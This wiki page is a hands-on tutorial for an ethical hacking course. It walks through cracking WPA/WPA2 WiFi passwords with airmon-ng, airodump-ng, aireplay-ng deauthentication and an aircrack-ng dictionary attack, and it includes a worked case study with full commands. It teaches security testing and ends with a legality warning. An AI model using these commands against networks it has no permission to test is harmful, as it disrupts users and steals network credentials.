Hands-on: Attack Wireless Network and Cracking WiFi Password (en)

From OnnoWiki
Jump to navigation Jump to search

Here is a detailed explanation and example of Attacking Wireless Networks and Cracking WiFi Passwords using KALI Linux 2024.3 for ethical hacking college needs:

Prerequisites for Tools and Software:

  • Kali Linux 2024.3 already installed.
  • WiFi adapter that supports monitor mode (example: Alfa AWUS036NHA).
  • Tools:
    • `airmon-ng` (enable monitor mode)
    • `airodump-ng` (capture packets)
    • `aireplay-ng` (inject packets)
    • `aircrack-ng` (crack WiFi passwords)

Hands-on Steps:

1. Activate Monitor Mode on WiFi Adapter

  • First, activate the WiFi adapter and make sure it is detected by the system.

ifconfig

  • Run the following command to enable monitor mode:

sudo airmon-ng start wlan0 ```

    • Note: Replace `wlan0` with the name of your WiFi interface. This will enable WiFi in monitor mode, allowing you to capture all WiFi traffic around it.

2. Capture Network Traffic with `airodump-ng

  • Use `airodump-ng` to capture WiFi packets around you:

sudo airodump-ng wlan0mon

    • wlan0mon is the name of the interface that is in monitor mode. This command will list the SSIDs, BSSIDs, channels, and other network information around you.

3. Targeting Networks and Capturing Handshakes

  • After looking at the target networks (SSID/BSSID), focus on one network with the following command:

sudo airodump-ng --bssid <BSSID_target> -c <channel> -w capture wlan0mon

    • <BSSID_target> is the MAC address of the access point, <channel> is the WiFi channel number. The captured packets will be saved in a file named `capture`.
  • To capture the handshake (WPA/WPA2 authentication data), perform a deauthentication attack on the connected client:

sudo aireplay-ng --deauth 10 -a <BSSID_target> -c <client_MAC> wlan0mon

    • This will disconnect the client, and when the client tries to reconnect, the handshake will be captured by airodump-ng.

4. Cracking WiFi Password with `aircrack-ng

  • After successfully getting the handshake, you can crack the password with a dictionary attack using `aircrack-ng`:

sudo aircrack-ng -w /path/to/wordlist.txt -b <BSSID_target> capture-01.cap

    • /path/to/wordlist.txt is the location of the wordlist (e.g. `rockyou.txt`), and capture-01.cap is the file containing the handshake. Aircrack-ng will try all the words in the wordlist to crack the password.

Case Study

For example, we get the following information:

  • Target network BSSID: `00:11:22:33:44:55`
  • Channel: 6
  • Wordlist file: `/usr/share/wordlists/rockyou.txt`

Steps:

  • Run `airodump-ng` and target the network:

sudo airodump-ng --bssid 00:11:22:33:44:55 -c 6 -w capture wlan0mon

  • Perform a deauth attack:

sudo aireplay-ng --deauth 10 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF wlan0mon

  • After the handshake is captured, crack the password:

sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 00:11:22:33:44:55 capture-01.cap

If the password is in the wordlist, the output will display the WiFi password.

Ethics and Legality

Keep in mind that performing unauthorized WiFi attacks is illegal. This should only be done in a controlled testing environment, such as a lab or a private network with the owner's consent.

Interesting Links